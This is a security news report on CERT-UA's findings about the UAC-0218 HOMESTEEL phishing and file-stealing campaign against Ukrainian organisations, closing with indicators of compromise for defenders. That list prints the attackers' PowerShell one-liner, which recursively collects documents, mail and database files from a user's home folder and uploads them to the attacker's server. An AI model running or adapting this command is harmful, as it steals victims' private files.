A recent cyber campaign by the threat actor tracked as UAC-0218 has introduced a new malware variant called HOMESTEEL that targets critical Ukrainian data repositories. This latest offensive, flagged by Ukraine’s Computer Emergency Response Team (CERT-UA), reflects the modus operandi of Ukraine’s adversaries who aim to steal sensitive information from government and business networks.
CERT-UA identified the phishing methods, which include emails baiting recipients through familiar subject lines like “account” and “details” and linking to a seemingly legitimate “eDisk” platform.
The eDisk link directs users to download RAR files that house malicious content, embedding two password-protected files labeled as “Contract20102024.doc” and “Invoice20102024.xlsx.” A concealed Visual Basic Script (VBS) file, “Password.vbe,” ultimately initiates HOMESTEEL’s data-siphoning operations.
The primary target files, such as those ending in “xls,” “xlsx,” “doc,” and “pdf,” are systematically collected from user directories up to five subfolders deep. HOMESTEEL’s code commands a recursive search, transmitting files under 10MB to an external server through an HTTP PUT request. This approach minimizes data size to evade potential detection while maximizing data collection.
HOMESTEEL’s Proxy Use Elevates Attack Complexity
UAC-0218’s techniques appear particularly well-tailored to the environment. HOMESTEEL can adapt to proxy settings on compromised systems, further camouflaging its network traffic.
CERT-UA reported that each outgoing request to the attacker’s server contains the full path of the extracted file, which may assist attackers in cataloging sensitive files across compromised systems. This level of customization suggests a level of surveillance intelligence typically seen in more complex, persistent attacks.
A notable aspect of the HOMESTEEL malware lies in its reliance on PowerShell, a command-line shell in Windows environments widely exploited in cyber operations.
CERT-UA researchers found an additional executable acting as a self-extracting archive with embedded PowerShell commands. These commands initiate further file reconnaissance, scanning user directories for extensions like xls*, doc*, pdf and eml, and dispatching files to a central server via HTTP POST requests.
This double-methodology showcases HOMESTEEL’s resilience, as it attempts to bypass any security hurdles the initial infection vector encounters.
Infrastructure Tactics Link Campaign to August Origins
The CERT-UA findings link UAC-0218’s activities back to August 2024, based on the domain registration data of its command infrastructure. Ukrainian cyber defenders on Wednesday revealed another campaign that began in August with a similar intent but no links between the two could be established as the threat actor in that case is tracked as UAC-0215.
The attackers leveraged HostZealot, a domain name registrar, and configured a custom Python-based web server as the central data-receiving platform. The server reveals a distinctive “Python Software Foundation BaseHTTP 0.6” banner, helping analysts attribute this campaign to the same infrastructure used in prior UAC-0218 attacks.
By reusing components across multiple operations, UAC-0218 demonstrates a persistent strategy that leverages existing digital assets to increase efficiency and reduce overhead.
The HOMESTEEL campaign raises pressing concerns for Ukraine’s government, which has long battled cyber aggression. As cyber espionage campaigns against Ukraine continue to evolve, CERT-UA’s proactive monitoring of UAC-0218 indicates a critical awareness of threats that leverage evolving malware tactics and refined phishing methodologies.
Indicators of Compromise as shared by CERT-UA
File Hashes:
10d486a514212bff2ef181010e8bd421 3432fe8487b72860cf60b54169f071e26336c56ff078ff78a13e8e29a02b4424 _№_601.rar dc7e9ab6374bccf3225d95ed4595a608 1679e968b0672342091b2bef5c379767bc59bf575f7ed8d9c6abbdc10fcafe01 Account20102024.xlsx 16e2255474930bab59d59a62caf35a5b 7dd938f2b0d809a80e9e3bf80f9c9d5b27145962871fdc19772ecda95b948abb Agreement 20102024.doc 7c95cd4b9471c904db3a5afc9179b3bc c95fcee5b3daace259c4f31f699c4fca82da7ebc8ed950caa630ca763b2b3e15 Password.vbe cd03aa7bc1b1f2b64f0c6856ba312484 f541d5c6338d65afba2245685ac1189b44c90393d7e67b70289e1f28b6da6c52 WEXTRACT.EXE d7a120fee99b0655a08f330a4542f141 465c8bbf75a1717546450cf88aa53d4e12345ab2c776b99dbef1c147da34966a install.txt 325a5308c225ed14355d5afcd12a059c 4ba64f21fb69f2b10debdcf9f8424d0090c98d4dfb3d0d0f9faac0458ba9ae00 POSTRUNPROGRAM 62febd43f2253710adaeea3a0639d26d b8e6665682f4a0a70dcbd4134441041f290fc8b357503ab122fc09911a8a9629 RUNPROGRAM
Network:
hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 1712-327.rar hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 3881-251.rar hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 612-118.rar hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 692-251.rar hXXps://edisk.in[.]ua/571df09c9c45758/account No. 1712-327.rar hXXps://edisk.ukrnet.01mirror.com[.]ua/571df09c9c45758/ №_601.rar hXXps://edisk.ukrnet.01mirror.com[.]ua/571df09c9c45758/Invoice No. 6492-115.rar hXXps://edisk.ukrnet.01mirror.com[.]ua/571df09c9c45758/2024-10-10_001.rar hXXps://staticgl[.]one/ hXXps://winupmirror[.]support/ edisk.ukrnet.01mirror.com[.]ua ukrnet.01mirror.com[.]ua 01mirror.com.ua 2024-10-10 ukrnames.com swiftydns.com edisk.in.ua 2024-10-23 ukrnames.com swiftydns.com winupmirror.support 2024-10-09 namecheap.com swiftydns.com staticgl.one 2024-08-23 namecheap.com registrar-servers.com 109[.]205.195.233 (C2) 194[.]107.92.234 (X-Originating-IP) 46[.]149.173.221 (X-Originating-IP) 94[.]140.114.32 94[.]140.114.76
Hosts:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
powershell.exe "(New-Object -ComObject Wscript.Shell).Popup('Error! OS Not Supported!')"
powershell.exe "[Net.ServicePointManager]::SecurityProtocol='Tls12';foreach($fil in dir $HOME -include('*.xls*','*doc*','*.pdf','*. eml','*.sqlite','*.pst','*.txt') -recurse | %{$_.FullName}){iwr https://staticgl.one/$fil -Method POST -infile $ file}"
